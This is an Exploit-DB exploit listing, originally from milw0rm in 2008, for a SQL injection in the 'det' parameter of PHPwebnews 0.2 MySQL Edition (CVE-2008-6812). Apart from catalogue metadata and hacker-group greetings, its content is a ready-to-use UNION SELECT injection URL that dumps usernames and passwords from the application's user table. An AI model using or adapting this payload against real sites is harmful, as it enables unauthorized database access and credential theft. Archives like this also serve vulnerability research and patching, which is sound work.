EXPLOITS

PHPwebnews 0.2 MySQL Edition - 'det' SQL Injection

Author: Virangar Security
type: webapps
platform: php
port: 
date_added: 2008-07-02  
date_updated: 2016-12-14  
verified: 1  
codes: OSVDB-54662;CVE-2008-6812  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.com476_phpwebnews-mysql.zip  

raw file: 5999.txt  

#######################################################################################
#
#        ...:::::phpwebnews-mysql 0.2  SQL Injection Vulnerability ::::....
#
#######################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir
=================================================================================
Discoverd By :virangar security team

User In Virangar : d4v00d_cr4ck3r
=================================================================================
Special TNX To:Mr.nosrati,H4di.H4di,black.shadowes,Mr.hesy,Zahra

& All virangar Members & All hackerz
 =================================================================================
Download:
http://www.codewalkers.com/codefiles/476_phpwebnews-mysql.zip
 =================================================================================
expl0it:
http://site.com/phpwebnews-mysql/bukutamu.php?det=-1/**/union/**/select/**/1,2,user,passwd,5,6,7/**/from/**/user/*
 =================================================================================
Young Iranian h4ck3rz
=================================================================================

# milw0rm.com [2008-07-03]